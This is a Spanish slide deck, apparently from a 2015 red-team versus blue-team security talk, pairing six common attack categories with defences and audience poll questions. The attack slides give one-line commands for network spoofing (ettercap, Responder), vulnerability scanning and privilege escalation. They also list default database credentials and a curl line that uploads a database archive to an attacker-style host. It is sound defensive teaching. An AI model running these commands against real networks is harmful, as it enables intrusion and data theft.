2. Introducción.
• Modo colaborativo.
• Se introducirá un tema y hacemos encuesta vía web.
• Al acabar vemos las respuestas y opinamos sobre ellas.
• Se espera vuestra participación (!!)
• Para que tenga sentido, vamos haciendo el test todos a
la vez.
URL: http://secby.me/redblueteam
3. • Fecha de creación: lunes, 02 de marzo de 2015
274
• Respuestas totales
• Respuestas completas: 182
4. Metodología: Assume Breach (Microsoft)
Metodología que da por perdida la primera parte de la batalla,
consiste en detectar gaps en las siguientes tácticas, técnicas y
procedimientos (TTP):
• Detección de ataques y penetraciones.
• Respuesta a los ataques y penetraciones.
• Recuperación de la fuga, modificación o compromiso de
información.
• Prevención de futuros ataques y penetración.
11. Red Team.
The Red Team is a group of full-time staff within <company>
that focuses on breaching client infrastructure, platform and
client own tenants and applications. They are the dedicated
adversary (a group of ethical hackers) performing targeted and
persistent attacks.
- Microsoft
Objetivo medible mediante:
• Tiempo medio para comprometer - Mean Time to Compromise
(MTTC)
• Tiempo medio para escalar privilegios o pwnage - Mean Time to
Privilege Escalation or “Pwnage” (MTTP)
18. Blue Team.
The Blue Team is comprised of either a dedicated set of
security responders or members from across the security
incident response, Engineering and Operations organizations.
-Microsoft
Objetivo medible mediante:
• Tiempo medio de detección - Mean-Time to Detect (MTTD)
• Tiempo medio de recuperación - Mean-Time to Recovery (MTTR)
Predecir Prevenir Detectar Responder
23. MTTC/MTTP Top 6 ataques
MTTD/MTTR Top 6 defensas
Desde una perspectiva de ejercicio con escenario interno.
24. Red Top 1/6: Credenciales.
• WTF. Lo mismo de siempre, 30 años después.
• Por eso sigue en el Top.
• Ejemplos:
• Contraseñas en el Group Policy Preferences.
• Contraseñas en los comentarios de un usuario del
directorio activo.
• SQL Server sa/<blank> Oracle: SYSTEM/MANAGER
• Marzo2015 o similares como contraseña en AD.
• Y eso, si no hay un xls con todas las passwords en
una carpeta pública en un file server…
5 mins pwnage:
• nmap -p 1433 --script ms-sql-empty-password
25. Blue Top 1/6: Credenciales.
Soluciones complejas (… por eso sigue en el top …)
• Robustecer “Passfilt.dll” de Windows con aplicación de terceros.
• Sistemas de salto “jumpbox” monitorizados.
• Soluciones de doble factor de autenticación.
• Aplicar acceso 4eyes a contraseñas sensibles / OTP
• “Honeyusers” con usuarios que únicamente ejecutan alertas.
• Monitorización exhaustiva de logins fallidos.
• Gestión de Identidades.
• Políticas de contraseñas, Captchas, bloqueos, etc…
27. Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22
28. Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22
29. Red Top 2/6: Vulnerabilidades en aplicaciones.
• Exploits conocidos o por conocer.
• Ejemplos:
• shellshock, heartbleed, jetleak…
• Los XP que quedan por ahí muertos.
• Java/Flash.
• Software de backup.
• Webs con RCE/LFI, etc.
5 mins pwnage:
• nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 …
• nmap -p 443 --script ssl-heartbleed …
• Metasploit …
• ./exploit-db.py
30. Blue Top 2/6: Vulnerabilidades en aplicaciones.
• Arquitectura de red: segmentación de red, reglas en firewall internos.
• Uso de IPS.
• Despliegue automático de parches:
• Windows: SCCM/WSUS .
• Linux: Satellite/Spacewalk/Landscape
• chef/puppet/salt, etc
• EMET - Enhanced Mitigation Experience Toolkit.
• Grsecurity.
• Controles en navegación. Ej: alertas con User-Agents específicos de
Java.
• Vulnerability Scans y Revisiones de cumplimiento.
32. Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28
33. Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28
34. Red Top 3/6: Ataques de red.
• Ataques Man In The Middle en sus 300 formas.
• Ejemplos:
• ARP Spoofing.
• WPAD Poisoning, LLMNR Poisoning.
• DHCP Spoofing.
• Rogue/Fake AP
5 mins pwnage:
• ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/
/192.168.1.1/
• Responder -i 192.168.1.100 -wrf
• ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1
Imagen de: http://www.sternsecurity.com/
35. Blue Top 3/6: Ataques de red.
• Aplicación de Network Access Control.
• Configuración de Dynamic ARP Inspection.
• Habilitar DHCP Snooping.
• El uso de protocolos cifrados.
• Desactivar IPv6.
• Desactivar Multicast Name Resolution.
• Evitar el uso de WPAD
• Implantar Wireless intrusion detection system
• Segmentación de red.
• Firewall / IPS
39. Red Top 4/6: Privilegios
• De usuario guarrete a local admin, de local
admin a domain admin y de ahí al infinito.
• Ejemplos:
• Servicios con permisos incorrectos.
• Binarios en local o servidores de ficheros con
permisos incorrectos.
• Uso de usuarios de aplicación privilegiados.
• Usuarios del dominio con privilegios de Local
Admin.
• sudo demasiado permisivo.
5 mins pwnage:
• PowerUp.ps1: Invoke-AllChecks
• Sticky keys
• Kon-Boot
40. Blue Top 4/6: Privilegios.
• Eliminar acceso al cmd y powershell.
• Meter en el registro una entrada no aceptando el EULA de
sysinternals (y proteger sus permisos).
• Activar UAC/Firewall de Windows.
• Permisos en las tareas programadas.
• Uso de listas blancas de binarios, comprobación de firmas, AppLocker,
etc.
• Eliminar acceso a USB/CD (bios)
• Cifrar contenido del disco duro, bitlocker y similares.
42. Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32
43. Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32
44. Red Top 5/6: In/Exfiltración
• Introducir o exportar información de la red. Documentos, herramientas o
cualquier otro tipo de fichero.
• Ejemplos:
• Mediante HTTP por el proxy.
• Correos electrónicos.
• Túneles DNS.
• IM
5 mins pwnage:
• curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php
45. Blue Top 5/6: In/Exfiltración.
• Inspección de SSL en navegación.
• Bloqueo de categorías tipo hacking, malware, etc.
• Bloquear la descarga de ejecutables y derivados.
• En caso de dominios no conocidos, página de bienvenida.
• Bloqueo de dominios jóvenes, Ej <20 días.
• Limitar peticiones POST, Ej cabeceras mayores de 50kb.
• No resolver DNS de Internet desde las workstation.
• Firmas específicas en IPS para túneles y otros covert channels.
• Bloqueo o cifrado de USB.
• Antivirus.